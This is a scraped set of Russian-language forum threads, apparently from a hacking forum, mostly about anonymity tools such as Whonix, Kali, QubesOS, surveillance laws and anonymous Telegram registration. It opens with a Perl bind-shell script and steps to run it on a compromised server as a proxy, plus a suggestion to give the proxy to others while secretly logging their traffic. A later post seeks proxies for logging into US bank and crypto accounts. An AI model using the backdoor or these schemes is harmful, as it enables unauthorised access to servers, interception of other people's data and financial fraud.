bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 50);
while(1){
accept(X, S);
unless(fork)
{ open STDIN, "<&X";
open STDOUT, ">&X";
open STDERR, ">&X";
close X;
exec("/bin/sh");
} close X;}

Click to expand...

Сохраняем код с файл с расширение .pl , например bind.pl
Заливаем его на шелл.
Выполняем на шелле команду perl bind.pl
После проделанных действий на шелле откроется 32767 порт.
Нам прийдётся подкорректировать в конфиге 3proxy порт, в строчке socks –p7855 меняем с 7855 на 32767.

З.Ы. А ведь ты можешь помимо собственного использования заюзать socks в своих мерзких делишках . Подумай сам, что тебе мешает создать отдельный проксик (как всё умные мерзавци-хакеры и щедро раздавать его направо и налевло, незабыв при этом указать для логов не дерикторию /dev/null , а в более подходящее для твоих гадких делишек место .

Удачи...

Whonix, все темы

ID: 676533bbb4103b69df3718db
Thread ID: 102566
Created: 2023-11-19T19:45:51+0000
Last Post: 2024-11-24T22:47:00+0000
Author: r_as
Replies: 26 Views: 5K

Темы:
- Whonix, обсуждение - /threads/100588/
- Aудит сетевой безопасности на Whonix - /threads/28637/
- Whonix и логи - /threads/33108/
- Как сделать свой Whonix? - /threads/57678/
- Как создать цепочку из нескольких Whonix Gateway? - /threads/54260/
- Whonix Gateway -> Linux (не Whonix Workstation) - /threads/102550/
- Помощь с настройкой Whonix в России - /threads/90165/
- Whonix + Lokinet - /threads/90379/
- Как поставить прокси в конце цепочки Whonix Gateway -> Windows? - /threads/71664/
- Ошибка при запуске Whonix - /threads/63324/
- Stream Isolation в ТОР вообще, и в Whonix в частности - /threads/62314/
- Необходимость редактирования настроек Whonix- workstation?- /threads/49758/
- Что думаете о Whonix? - /threads/53670/
- Связка VPN > Whonix GW > VPN - /threads/41654/
- Tails/Whonix/Kodachi безопасно ли на самом деле? - /threads/42740/
- Whonix + Vmware? - /threads/42653/
- Whonix+Kali exit node - /threads/32478/
- Микровопрос по OS Whonix - /threads/32702/
- Whonix + Sphere - threads/27851/
- Multiple_Whonix-Gateway - [http://www.dds6qkxpwdeubwucdiaord2x...vjwsyd.onion/wiki/Multiple_Whonix- Gateway#KVM](http://www.dds6qkxpwdeubwucdiaord2xgbbeyds25rbsgr73tbfpqpt4a6vjwsyd.onion/wiki/Multiple_Whonix- Gateway#KVM)
- Whonix не пропускает звонки - /threads/103058/
- Как Whonix, но VPN вместо Tor - /threads/41899/

Статьи:

- Whonix. Как работать и общаться, и не сесть на бутылку - /threads/54947/
- Анонимный пентест. Kali linux посредством Whonix Gateway - /threads/88542/
- Как получить полную анонимность с помощью Tor, Whonix и PIA VPN? - /threads/27820/

В связи с интересом, собрал все темы в одном месте

Анонимный пентест. Kali linux посредством Whonix Gateway

ID: 676533bbb4103b69df371924
Thread ID: 88542
Created: 2023-05-21T15:57:21+0000
Last Post: 2024-09-30T09:50:53+0000
Author: DedJhones
Replies: 40 Views: 5K

Анонимный пентест. Kali linux посредством Whonix Gateway

Доброго времени суток, сегодня мы рассмотрим такую полезную штуку как: Kali linux через шлюз Whonix Gateway и все это на VirtualBox
Рассказывать вам про преимущества Whonix я не буду, думаю вы и так все знаете сами…
В чем прелесть нашей схемы: в том что мы обеспечиваем себе анонимный пентест любого ресурса т.к наша Kali будет работать через шлюз и даже если вы словите самый опасный и злой руткит на свою Kali он не сольет наш реальный ip адрес.

Что нам потребуется?

1. VirtualBox — качаем с официального [сайта](https://codeby.net/goto/link- confirmation?url=aHR0cHM6Ly93d3cudmlydHVhbGJveC5vcmcvd2lraS9Eb3dubG9hZHM%3D&s=f3ec49f2d8b62fd0c5435bc0ab8bb0c4).

2. Качаем Whonix Gateway с официального [сайта](https://codeby.net/goto/link- confirmation?url=aHR0cHM6Ly93d3cud2hvbml4Lm9yZy93aWtpL1ZpcnR1YWxCb3g%3D&s=c5ee1308053c234493f20e7def8f2629).

3. Образ диска Kali Linux с официального [сайта](https://codeby.net/goto/link- confirmation?url=aHR0cHM6Ly93d3cua2FsaS5vcmcvZG93bmxvYWRzLw%3D%3D&s=c3918ed35e99e3128a44f0051a3f61cf)

4. 15-30 мин для настройки

Приступаем к осуществлению плана:

1. Импортируем настройки Whonix Gateway в Virtual box

2. Подготавливаем почву под Кали в виртуал боксе, нажимаем СОЗДАТЬ.

Name: Вводим имя машины (например: kalilunux). Type: Linux. Version: Debian (выбираем разрядность нашей кали)

3. Выделяем размер памяти (1024-4096) MB

4. Create a virtual hard drive now

5. Выбираем VDI

6. Выбираем Dynamically allocated (Динамический размер)

7. Выделяем 15-30гб

8. Машина создана

Изменяем настройки машины (kalilinux)

1. Выбираем нашу машину (kalilinux) -> Settings -> System -> Motherboard -> Hardware Clock in UTC

2. System -> Motherboard -> Pointing Device -> PS/2 Mouse (необходимо для отключения usb-контроллера)

3. System -> Processor -> Enable PAE/NX если доступно

4. Network -> Adapter 1 -> Name (Internal Network) : Whonix

5. USB -> Отключить “Enable USB controller”

Запускаем нашу машину (kalilinux) и устанавливаем.

Выбираем в качестве установочного диска образ с Kali

В меню загрузки выбираем Istall
Language: English
Country: United States
Keymap to use: American English
Whonix-Gateway у нас пока выключен, поэтому выбираем Do not configure the network at this time
Hostname: host
Задаем пароль для пользователя root
Timezone: Eastern (потом установим в UTC)
Partition disk — разбиваем диск по умолчанию
Use network mirror — No
Устанавливаем grub и перезапускаем машину (образ диска Kali выгрузится автоматически)

Усиливаем безопасность:

Ставим время в UTC

sudo su

ln -fs /usr/share/zoneinfo/Etc/UTC /etc/localtime

echo UTC0 > /etc/localtime

Отключаем Tcp timestamps

echo “net.ipv4.tcp_timestamps = 0” > /etc/sysctl.d/tcp_timestamps.conf

Настраиваем сеть

Удаляем network-manager

apt-get remove network-manager

vim /etc/network/interfaces (можно просто открыть текстовым редактором и добавить) и добавляем строки:

Code:Copy to clipboard

auto eth0
iface eth0 inet static
address 10.152.152.12
netmask 255.255.192.0
gateway 10.152.152.10

Указываем dns:

echo nameserver 10.152.152.10 > /etc/resolv.conf

Исправляем sources.list

vim /etc/apt/sources.list

добавляем:

Code:Copy to clipboard

deb http://http.kali.org/kali kali-rolling main contrib non-free
# For source package access, uncomment the following line
# deb-src http://http.kali.org/kali kali-rolling main contrib non-free

Включаем Whonix — Gateway и обновляем систему (kali)

apt-get update && apt-get dist-upgrade

reboot

Tor-browser

Устанавливаем Tor — browser с сайта torproject.org

Чтобы Tor запускался от пользователя root находим секцию в файле start-tor- browser и закомментируем ее:

cd Desktop (если Тор вы загрузили на раб. стол)

vim ./tor-browser_en-US/Browser/start-tor-browser

Code:Copy to clipboard

#if [ "`id -u`" -eq 0 ]; then
# complain "The Tor Browser Bundle should not be run as root. Exiting."
# exit 1
#fi

меняем владельца:

chown -R root:root ./tor-browser_en-US/

Сейчас у нас tor-browser выходит через прозрачный прокси на whonix-gateway — следовательно у нас сценарий Tor over Tor, что не есть хорошо. Чтобы этого избежать установим rinetd, который у нас будет перенаправлять порты, к которым обращается tor с локальной машины на whonix — gateway.

apt-get install rinetd

vim /etc/rinetd.conf

и добавляем туда следующие строки ( взяты из whonix-workstation):

Code:Copy to clipboard

## SocksPorts
## Tor's default port
127.0.0.1 9050 10.152.152.10 9050
## Tor Browser Bundle's default port
127.0.0.1 9150 10.152.152.10 9150
## TorChat's default port
127.0.0.1 11109 10.152.152.10 9119
## Tor Messenger's default port
127.0.0.1 9152 10.152.152.10 9152
## ControlPorts
## Control Port Filter Proxy is running on Gateway's Port 9052
## Tor's default port
127.0.0.1 9051 10.152.152.10 9052
## Tor Browser Bundle's default port
127.0.0.1 9151 10.152.152.10 9052
## Tor Messenger's default port
127.0.0.1 9153 10.152.152.10 9052

Также добавляем переменные окружения:

vim ~/.profile

добавляем:

Code:Copy to clipboard

export TOR_SKIP_LAUNCH=1

export TOR_SKIP_CONTROLPORTTEST=1

export TOR_NO_DISPLAY_NETWORK_SETTINGS=1

export TOR_CONTROL_HOST="127.0.0.1"

export TOR_CONTROL_PORT="9151"

export TOR_CONTROL_PASSWD='"password"'

И запускаем tor браузер. Теперь ip адрес выходной ноды можно найти в списке тор-цепочек на whonix-gateway, запустив arm — мы избежали tor over tor. В принципе на этом можно остановиться.

Наша машина для пентеста готова! Скажу что для сканирования портов и других некоторых задач нужно будет поставить VPN поверх нашего TORа:

Качаете свой конфиг openvpn, если он лежит в папке Downloads (Загрузки)
пишем в терминале:

cd Downloads

openvpn --config ./name.opn

name — имя ващей конфигурации openvpn

Лучший Linux для анонимности

ID: 676533bbb4103b69df37193d
Thread ID: 66978
Created: 2022-05-13T20:00:03+0000
Last Post: 2024-08-18T17:33:55+0000
Author: hipeople
Replies: 70 Views: 5K

Здравствуйте У меня к вам небольшой вопрос про анонимность . Я использую qubes и whunix (пускаю всё через тор, использую неплохой прокси ) . Мне кажется это весьма хорошо для собственно анонимности. Недавно я спорил о том "слишком много шифроваться может обратить не тебя внимание"(это так но мне кажется слишком расслабиться глупо). Тот человек ещё сказал "Используй кодачи(если говорить о его безопасности то тут ОЧЕНЬ большие сомнения те же открытие порты и тд) " Ещё есть какой нибудь tails тоже сомнительная тема. А как вы думаете что лучше для этого ?

Немного о том, как работает СОРМ, ОРИ, прослушка и логгирование в социальных сетях

ID: 676533bbb4103b69df37194d
Thread ID: 27888
Created: 2019-02-15T17:57:29+0000
Last Post: 2024-06-28T11:05:52+0000
Author: tabac
Replies: 11 Views: 5K

Ни для кого не секрет, что популярные российские сервисы небезопасны. Ваша переписка в любой момент может оказаться в поле зрения отечественных блюстителей закона. Рассказываем, о чем нужно помнить, общаясь через разные каналы связи.

СОРМ и ОРИ

Есть много разных способов прослушать ваш телефон. Официальный и законный — СОРМ, система технических средств для обеспечения функций оперативно-разыскных мероприятий. По закону в РФ все операторы сотовой связи обязаны устанавливать на своих АТС такую систему, если не хотят лишиться лицензии. Видов СОРМ три: первый придумали в 80-х, второй стали внедрять в нулевых, а третий пытаются навязать операторам с 2014 года. По данным РБК, большинство операторов пользуются вторым типом, но в 70% случаев система работает некорректно или не работает вовсе. Однако, по стационарному телефону и через обычный вызов с мобильного чувствительные темы все равно лучше не обсуждать.

Схема работы СОРМ-2 (Источник: mfisoft.ru)

Согласно 97-ФЗ, любые мессенджеры, сервисы и сайты, которые действуют на территории России, должны быть внесены в реестр [Организаторов распространения информации](https://97-fz.rkn.gov.ru/organizer- dissemination/viewregistry/#searchform). По «закону Яровой» они обязаны хранить все данные пользователей, в том числе записи голосовых звонков и переписку, в течение полугода. В ОРИ, кстати, есть и Хабрахабр.

Работа реестра подробно описана [здесь](https://tjournal.ru/44230-kak- rabotaet-registraciya-messendzherov-v-roskomnadzore-na-primere-threema) на примере Threema, но главный вывод таков: теперь по запросу российских властей любая информация о вас может оказаться в правоохранительных органах. Поэтому первое, что нужно сделать для сохранения конфиденциальности — перенести звонки и сообщения в мессенджеры, которых в реестре ОРИ нет. Или в те, которые там есть, но передавать данные властям отказываются — как Threema и Telegram.

Справка : Само по себе нахождение в реестре ОРИ не гарантирует того, что данные будут передаваться властям. Надо постоянно мониторить новости и смотреть на реакцию мессенджера, когда за ним «придут».

Голосовые звонки и сообщения

Наши разговоры и сообщения от вмешательства третьего лица может защитить end- to-end шифрование, поэтому мессенджеры с Е2Е считаются наиболее безопасными. Но это не совсем так: рассмотрим популярные варианты.

Telegram [поддерживает](https://daily.afisha.ru/news/10375-pavel-durov- obyasnil-pochemu-u-telegram-po-umolchaniyu-ne-vklyucheno-end-to-end- shifrovanie/) end-to-end шифрование в своих Secret Chats и хранит зашифрованные данные о вашей переписке в облаке, которое раскидано по разным странам с «безопасной» юрисдикцией. Но после статьи на Хабре об иллюзии безопасности Telegram Passport в Е2Е от Дурова можно начать сомневаться.

Конечно, общение в Secret Chats по-прежнему остается хорошим вариантом для параноиков. В их шифровании сервер вообще никак не задействован: сообщения передаются peer-to-peer, то есть напрямую между участниками переписки. Для пущего спокойствия можно воспользоваться функцией самоуничтожения сообщений по таймеру. Но не стоит слепо полагаться на Telegram. Чтобы он стал чуть более безопасным, вы и ваш адресат должны зайти в настройки мессенджера и сделать минимум две вещи:

Поставить пароль при входе в приложение (Privacy and Security —>Passcode);
Включить двухэтапную аутентификацию (Privacy and Security —>Two-Step Verification).

После этого в дополнение к коду из SMS при входе с нового устройства приложение будет запрашивать пароль, который знаете только вы.

Сейчас подтверждение входа только через SMS никак не защищает человека, который пользуется российской SIM-картой. О случаях взлома Telegram-аккаунтов через перехваченное SMS-сообщение уже известно — в 2016 году злоумышленники [получили доступ](https://tjournal.ru/27313-oppozicionnye-aktivisty- pozhalovalis-na-udalennyy-vzlom-akkauntov-v-telegram) к переписке нескольких оппозиционеров, а в 2017 году был взломан аккаунт журналиста «Дождя» Михаила Рубина.

WhatsApp пока что избегает реестра ОРИ и тоже использует end-to-end шифрование, но с ним все не так безоблачно. Недавно мы публиковали новость о жителях Магадана, на которых завели уголовное дело за критику мэра города. Эта история, к счастью, закончилась обычным штрафом. Но подтвердила опасения пользователей: в групповых чатах WhatsApp общаться небезопасно.

Что будет?

Как только вы напишите сообщение, ваш номер телефона сразу станет доступным всем участникам группы. А по номеру вашу личность легко вычислить.

Что делать?

Решением может стать «левая» SIM-карта или зарубежный номер — желательно европейский.

Если вы пользуетесь российской картой, зарегистрированной на ваше имя, избегайте язвительных комментариев в группах с названием вроде «Мэру — отставку»: для WhatsApp лучше оставить только личные переписки и звонки.

Viber тоже не значится в реестре ОРИ, но поддерживает коммуникацию с российскими властями (в свободное от рассылки спама время). Этот мессенджер одним из первых выполнил новые требования правительства: он хранит логины и номера телефонов пользователей-россиян на территории РФ, но данные сообщений предоставить отказывается — ссылается на механику end-to-end шифрования и корпоративную политику.

Apple также использует end-to-end, но при регистрации в iMessage создает две пары ключей: приватную и публичную. То сообщение, которое вы получаете от такого же владельца яблочного девайса, передается вам с шифрованием, при котором используется публичный ключ. Расшифровать его можно только с помощью приватного ключа адресата, который хранится на его устройстве. О том, как Apple относится к конфиденциальности пользователей и что предпримет, если получит запрос от правительства, можно почитать здесь. Случаев передачи компанией данных российских пользователей властям РФ не зафиксировано.

Источник:https://www.apple.com/business/docs/iOS_Security_Guide.pdf
https://www.apple.com/business/docs/iOS_Security_Guide.pdf
Но у iMessage есть два минуса:

Написать или позвонить через эти каналы вы можете только такому же владельцу Apple;
Если у вас проблемы с интернет-подключением, сообщение пойдет по обычному сотовому каналу и станет простым SMS, которое легко можно перехватить.

Чтобы избежать превращения iMessage в SMS, можно отключить эту функцию в настройках.

![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fol%2Feb%2Frg%2Folebrgkn- cukb-ubo1c-4peconu.jpeg&hash=f156546ad56b58b84bd413a7e83c3521)

Исследователи из Electronic Frontier Foundation [утверждают,](https://www.eff.org/deeplinks/2018/03/why-we-cant-give-you- recommendation) что на сто процентов безопасного варианта для звонков и сообщений не существует. Если какие-то мессенджеры не дают властям получить ваши приватные данные, это еще не значит, что в обход законов этого не могут сделать хакеры (или государство, которое может воспользоваться их услугами). Чтобы дать пользователю уверенность в том, что никакого man-in-the-middle нет, у Telegram есть милая фишка: при звонке оба адресата могут убедиться, что видят одни и те же эмодзи в правом верхнем углу экрана — это и будет подтверждением отсутствия «вторжения» в соединение.

Если вам нужен более надежный способ коммуникации, рекомендуем не просто пользоваться секретными чатами, паролями и двухэтапной/двухфакторной аутентификацией, но и присмотреться к менее популярным нишевым приложениям вроде Confide или Signal.

Я пользуюсь Signal каждый день. #заметкидляФБР (Спойлер: они уже знают)

Для защиты мессенджеров помимо Signal есть поддержка OTR во многих клиентах поверх любых протоколов, есть OMEMO в Jabber, есть Riot (Matrix). Недавно была статья с обзором, к сожалению там не было Tox. Вот из неё сводная табличка:

Электронная почта

Популярные компании, которые дают возможность пользоваться своими почтовыми клиентами (в России это Яндекс, Mail.Ru и Rambler), уже включены в реестр ОРИ, а значит не слишком безопасны. Да, Mail.Ru Group призывает остановить уголовные дела за мемы и амнистировать осужденных, но может отдать информацию о ваших данных властям по первому требованию.

Даже если вы пользуетесь западными почтовыми клиентами вроде Gmail или Outlook, включили двухфакторную аутентификацию и знаете, что ваше письмо шифруется с помощью надежного протокола SSL/TLS, вы не можете быть уверены, что письмо вашего адресата так же защищено.

Варианты защиты:

При отправке чувствительной информации шифровать письма с помощью Pretty Good Privacy (PGP). Эта программа помогает превратить данные из письма в бессмысленный набор символов для всех, кроме отправителя и получателя;
При отправке важной информации всегда обращать внимание на домен адресата и не писать на подозрительный адрес;
Заранее уточнить у адресата, не настроена ли у него переадресация или сбор почты через российский почтовый сервис.

В случае с отечественными компаниями из реестра ОРИ никакое шифрование на стороне пользователя в принципе не поможет. Информация не перехватывается, а сохраняется и передается конечными точками — подобными сервисами. Решением может быть только замена их на более безопасные аналоги вроде ProtonMail, Tutanota или Hushmail. Больше таких почтовых сервисов можно найти на этой странице.

Социальные сети

Для начала минимизируйте свое пребывание в популярных российских социальных сетях — «Мой мир», «Одноклассниках» и «ВКонтакте». Facebook хотя бы не передает ваши данные российским спецслужбам. По крайней мере, таких случаев не зафиксировано.

Но интересно, что в 2017 году 85% запросов от правительства США компания все же удовлетворила:

Скриншоты изFacebook Transparency Report

Если вы слишком сильно привыкли к ВК, но не хотите оказаться на скамье подсудимых, обратите внимание на несколько вещей:

ваши сохраненные картинки;
посты, комментарии и сообщения, которые пишете;
посты, которые лайкаете;
посты, которыми делитесь;
пользователи, с которыми дружите.

Во всем вышеперечисленном лучше избегать того, что можно посчитать оскорбляющим или экстремистским. Всегда помните, что «распространением» является сообщение «противозаконной» информации хотя бы одному человеку. Юрист международной правозащитной группы «Агора» Дамир Гайнутдинов утверждает, что по закону ОРИ[обязаны хранить и передавать ](https://daily.afisha.ru/brain/9723-chto-udalit-so-stranicy-vo-vkontakte- chtoby-ne-popast-pod-sud-obyasnyaet-yurist-agory/)правоохранительным органам даже черновики неотправленных сообщений. Еще о том, как не сесть за репост, читайте здесь.

Кстати, с некоторых пор любой, у кого есть ваш номер телефона, может по умолчанию найти вас во ВКонтакте, даже если сама страница ничем не выдает вашу реальную личность.

Запретить находить вас по номеру можно в настройках профиля (Настройки — > Приватность —> Связь со мной). Но это, конечно, не спасет от спецслужб. Не используйте звонки и видеосвязь во ВКонтакте: неизвестно, действительно ли сеть шифрует их end-to-end, как утверждает администрация.

Безопасность сайтов

Единственная хорошая новость в том, что больше половины всех популярных сайтов в интернете уже имеют https-версию или полностью перешли на использование только https-версий. Получаемая и передаваемая информация на таких сайтах шифруется и не может быть прочитана третьими лицами. Такие ресурсы помечаются зеленым цветом и словом «защищено».

На этом хорошие новости заканчиваются. Несмотря на https-протокол, факт посещения такого сайта и DNS-запросы (информация о том, к каким доменам вы обращались) все равно остаются на виду у интернет-провайдера.

Но еще хуже другая новость: оставшаяся половина сайтов работает по обычному http-протоколу, то есть без шифрования данных. Решением может стать VPN, который шифрует абсолютно все получаемые и передаваемые данные так, что на стороне интернет-провайдера и любого, кто попытается внедриться между вами и конечным сайтом, нет никакой читаемой информации. Единственное, что будет видно — факт подключения к некоему IP-адресу в интернете (то есть к VPN- серверу). И более ничего.

Мы будем счастливы, если жизнь действительно вдруг станет такой простой: включил VPN и забыл об утечке чувствительной информации. Но это не так. Регулярно проверяйте, не вошел ли ваш любимый ресурс в реестр ОРИ, следите за тем, как он взаимодействует с властями, проверяйте активные подключения в настройках мессенджеров и социальных сетей и сбрасывайте подозрительные (а потом обязательно меняйте пароли).

(с) HideMy.name

Регистрируем telegram максимально анонимно!

ID: 676533bbb4103b69df371965
Thread ID: 89733
Created: 2023-06-05T08:32:43+0000
Last Post: 2024-05-28T09:09:51+0000
Author: g-man-original
Prefix: Мануал/Книга
Replies: 27 Views: 5K

Привет %username%! Сейчас опишу краткий мануал, как зарегать безопасно телеграм или другое любое приложение которое требует авторизоваться на мобиле.

Первое что нам потребуется virtualbox.

Качаем и устанавливаем

Oracle VirtualBox

www.virtualbox.org

Дальше качаем whonix и устанавливаем. Есть куча материалов и на данном борде как это сделать и вообще в инете.

![www.whonix.org](/proxy.php?image=https%3A%2F%2Fwww.whonix.org%2Fw%2Fimages%2F3%2F36%2FWhonix- homepage-main- preview.jpg%3Fversion%3D2a51b146181c9dfce21162fa6bdeb03f&hash=ff534c16d409c9a26fcccfd533682fa9&return_error=1)

Whonix - Superior Internet Privacy

Whonix can anonymize everything you do online! It runs like an App, is a Free, Open Source and Kicksecure™ hardened Linux distribution.

![www.whonix.org](/proxy.php?image=https%3A%2F%2Fwww.whonix.org%2Ffavicon-32x32.png%3Fhsversion- headscript-replacement-by- server%3D1%26hsversion_from_server_replacement_unixtime%3D1733131824&hash=dccb0fbf19f430107177d5583d7a1009&return_error=1) www.whonix.org

Клиент можно удалить, оставить только gateway. Запустить настроить.

Дальше качаем образ android

Android-x86 - Porting Android to x86

Android-x86 is an Android Open Source Project licensed under Apache Public License 2.0. Some components are licensed under GNU General Public License (GPL) 2.0 or later.

www.android-x86.org

Создаем виртуалку со следующими параметрами
hdd > 8gb
ram > 2048mb
network - internal (выбрать whonix)
остальные параметры на усмотрение

Запускаем и начинаем установку.

![www.howtogeek.com](/proxy.php?image=https%3A%2F%2Fwww.howtogeek.com%2Fwp- content%2Fuploads%2F2017%2F06%2F2017-06-27_10h47_57-650x300.png%3Fheight%3D200p%26trim%3D2%2C2%2C2%2C2&hash=30283a39a80314b3e9bd421cbd6fca01&return_error=1)

[ How to Install Android in VirtualBox

](https://www.howtogeek.com/164570/HOW-TO-INSTALL-ANDROID-IN-VIRTUALBOX/)

If you’re itching give Android a try but don’t necessarily want use your whole computer for the task, the best option is to run it in a virtual machine using VirtualBox. It’s actually pretty easy to set up, and will offer you the full Android experience in a matter of a few minutes. Let’s do...

www.howtogeek.com

Все сделали и перезагружаемся без образа. И тут идет настройка сети, бэкапов и всего остального. Пропускаем это все. И после чего у нас откроется android. Теперь вам нужно зайти в настройки сети. Там вы увидите попытку приконектиться к VirtualWifi. Вот настройки этой сети мы будем изменять.

ip: 10.152.152.100
gateway: 10.152.152.10
dns: 10.152.152.10

Выключаем и включаем wifi. Смотрим что появился инет и перезагружаем виртуальную машину для дальнейшей настройки!

Можно пользоваться! Хоть телеграм хоть любое другое приложение.

Но помните чтобы получить код смс вы можете поступить двумя способами.
1. Купить за биткоины, или другую крипту,номер через тор браузер
2. Купить реальную симку и одноразовый телефон, и уехать далеко от дома.

Удачи! Если есть вопросы, пишите :cool:

Max FPS for free

ID: 676533bbb4103b69df371e0d
Thread ID: 5220
Created: 2005-10-19T16:03:58+0000
Last Post: 2006-03-08T10:39:53+0000
Author: MekJack
Replies: 10 Views: 5K

Подскажите как добиться максимально возможного FPS без покупки асек? proxycheker собрал 160 - FPS 0.001.....

Альтернатива 911.re, vip72, luxsocks

ID: 676533bbb4103b69df37196d
Thread ID: 70831
Created: 2022-07-23T14:51:02+0000
Last Post: 2024-05-17T00:05:12+0000
Author: danthe
Replies: 63 Views: 5K

i need professional socks5 service like

911
vip72
luxsocks

vip72 and luxsocks are closed.

911 also did an update today so it is no longer usable for financial account

My purpose for using proxies is to login usa bank and crypto accounts.

If there are any services you can recommend, please specify below.

Во-первых, я пользуюсь переводом, потому что не знаю русского языка. извините, если я сказал что-то не так

мне нужен профессиональный сервис socks5

911
вип72
как люкссокс

vip72 и luxsocks закрыты.

911 также сделал обновление сегодня, поэтому его больше нельзя использовать.

Моя цель использования прокси — вход в американские банки и крипто-счета.

Если есть какие-либо услуги, которые вы можете порекомендовать, пожалуйста, укажите ниже.

Анонимность, безопасность Windows

ID: 676533bbb4103b69df37196f
Thread ID: 50774
Created: 2021-04-18T16:23:27+0000
Last Post: 2024-05-16T18:14:38+0000
Author: pinkdeath
Replies: 72 Views: 5K

Столкнулся с такой проблемой. Решил тотально подойти к свое безопасности.
Знаю , что windows , в своей стандартной сборке, очень небезопасна для "работы".
Есть ли какие-нибудь софтины, которые могут обеспечить безопасность.Знаю только Blackbird, и то из-за неё винде становится плохо.
Прошу отвечать по существу.

QubesOS - самая безопасная ОС

ID: 676533bbb4103b69df3719c8
Thread ID: 57814
Created: 2021-10-17T08:41:30+0000
Last Post: 2024-01-11T20:48:22+0000
Author: Arg0s
Prefix: Статья
Replies: 37 Views: 5K

В данной статье я расскажу о самой безопасной, по моему мнению, ОС - QubesOS
Я постараюсь максимально доступно описать принцип работы данной ОС и её преимущества, относительно других анонимных ОС.
Основными принципами построения защищенных ОС являются шифрование и изоляция средствами виртуализации, всё это реализованно в QubesOS.
QubesOS - свободная и открытая ОС, она основана на гипервизоре Xen, X Window System и Linux, она использует виртуализацию для реализации доменов безопасности с помощью изоляции.
Qubes было бы некорректно назвать дистрибутивом Linux, скорее, Qubes - дистрибутив Xen.
Xen - гипервизор 1го типа, который работает "на железе", а не как гипервизоры 2го типа, такие как VirtualBox и VMware, которые работают по принципу "система в системе".
Как считают разработчики Qubes, Xen лучше подходит для создание безопасных систем, по сравнению с KVM.
Схема работы и уровней доверия в QubesOS представлена на картинке:

Виртуализация снижает количество интерфейсов между доменами безопасности, но несмотря на это позволяет доменам безопасности взаимодействовать между собой, такой подход серьезно уменьшает поверхность атаки.
Для запуска приложений в Qubes используютя так называемые шаблоны, основанный на Fedora, Debian или Whonix(есть и другие шаблоны). Интеграция с Whonix очень сильно улучшает анонимность и безопасность во время работы.
Шаблоны могут быть изолированны друг от друга, либо взаимодействовать друг с другом.
Так же Qubes использует микроядро в качестве кода, для обеспечения изоляции, такой подход так же уменьшает поверхность атаки, в то время как другие ОС(типа Debian) используют монолитное ядро. Атакующий должен скомпрометировать Xen, чтобы получить полный контроль над системой, это намного труднее, чем попасть в основную систему из гостевой(это тоже маловероятно).
Такой подход требует и относительно высоких требований к железу, для хорошей работы Qubes требуется x64 процессор с поддержкой Intel VT-x с EPT или AMD-V с RVI(Intel VT-d или AMD-Vi), 16гб ОЗУ и быстрый SSD накопитель, так же я рекомендую использовать Coreboot + SeaBIOS/Tianocore вместо проприетарного BIOS, на тех устройствах, где это возможно. Так же рекомендуется использовать устройства без дискртеной графики, т.к. Qubes не поддерживает виртуализацию видеокарт. В качестве графического окружения я рекомендую использовать XFCE.
При установке Qubes нужно использовать полнодисковое шифрование(FDE).
В Qubes есть одноразовые виртуальные машины, после их использования они полностью удаляются, не оставляя следов, они отлично подходят для того, что зайти на какой-либо ресурс под другой личностью, параллельно с основной, либо открыть подозрительный файл, и не бояться подхватить вредоносное ПО.
Работа с сетью в Qubes происходит в отдельной виртуальной машине(NetVM), такой подход делает бесполезным эксплуатацию уязвимостей в драйверах вашего сетевого интерфейса, атакующий просто попадет в сетевую виртуальную машину.
Для противодействия атакам типа BadUSB, в Qubes используется отдельная виртуальная машина для управления USB интерфейсами(UsbVM).
Для открытия приложений используются легковесные виртуальные машины AppVM(например, для запуска браузера). Каждая AppVM основана на шаблоне Fedora(шаблон можно изменить, я рекомендую использовать Debian или Whonix).
Каждый домен безопасности в Qubes имеет определенный цвет:
Красный - недоверенный
Зеленый - доверенный
Желтый и оранжевый - нечто среднее
Синий и черный - наиболее безопасные (черный самый безопасный)
Подводя итоги, можно сказать, что на данный момент QubesOS является лучшей защищенной ОС из всех представленных, благодаря виртуализации она защищает вас от аппаратных закладок, а при использовании её вместе с Whonix ещё и затрудняет ваше отслеживание.
Из минусов - QubesOS очень плохо подходит для новичков, и понять принцип её работы рядовому пользователю очень тяжело.
Стоит отметить, что QubesOS не одобрена FSF по той же причине, что и Debian.
Скачать QubesOS - https://www.qubes-os.org/
Список совместимого оборудования с QubesOS - https://www.qubes-os.org/hcl/

Идентификация железа

ID: 676533bbb4103b69df3719d8
Thread ID: 51786
Created: 2021-05-14T20:30:44+0000
Last Post: 2023-12-04T20:48:15+0000
Author: Benihowy
Prefix: Статья
Replies: 20 Views: 5K

Мало кого можно удивить сбором информации о железе тем или иным приложением. Но конкретно, какая информация может быть доступна мало кто знает. Найти все идентификаторы нашего железа можно различными способами, для любителей консолей есть варианты через poweshell. Я сторонник графического интерфейса, поэтому для этих целей необходимо воспользоваться сторонним софтом. Возьмём, например, CIM Explorer

Теперь рассмотрим некоторые идентификаторы железа с помощью этой программы. Информация хранится во вкладке CIMV2. Чтобы узнать идентификатор нужно по классу нажать ctrl+q и внизу в окошке Output будет результат. Итак, приступим
CIM_Display

CIM_OperatingSystem

Win32_BIOS

Win32_OperatingSystem

Win32_ComputerSystemProduct

Так как это виртуальная машина, то не все значения видны, на реальном железе не будет такого недостатка. Нужно понимать, каждое устройство начиная от материнской платы и заканчивая мышью имеет свой уникальный идентификатор и перечислять их все составит 10 страниц. Имея доступ к этой информации можно на 100% узнать всю историю серфинга любого пользователя. Впн, тор и прочие анонимайзеры будут просто бесполезны, если браузер захочет узнать, например, серийный номер биоса и будет привязан к нему. Такого быть не может? Зачем браузеру такая информация? Это очень хороший вопрос, ответа на него к сожалению, еще нету. Но запрос информации про биос есть. Нам понадобится некий софт, который отлавливает WMI запросы – wmimon. Качаем, например, с гитхаба. Запускаем через консоль wmimon.exe и ждем. Возьмем самый популярный браузер Google Chrome

При запуске браузер требует информацию Manufacturer и Model с раздела Win32_ComputerSystem. А что это? А это материнская плата, вендор и модель. Далее ему нужен серийный номер БИОСа (Serial Number from Win32_BIOS). Наверное, это очень важная информация, без которой браузер не сможет работать. А может эта информация используется несколько для иных целей – идентификации.
Всем известен Chrome своими сборами данных, и тут ничего удивительно. Возьмем браузер Firefox

Здесь разработчики не стали долго думать и запросили полностью всю информацию с Win32_BIOS и Win32_PhysicalMemoryArray. Вот это стало неожиданным.
А как насчет tor браузера? Ведь его называют анонимным и т.д.

Увы, но он основан на Firefox, поэтому тоже запрашивает информацию.
Посмотрим, что делает Opera

Тут целый букет. Материнская плата, процессор, ОС
Возьмем браузер Sphere

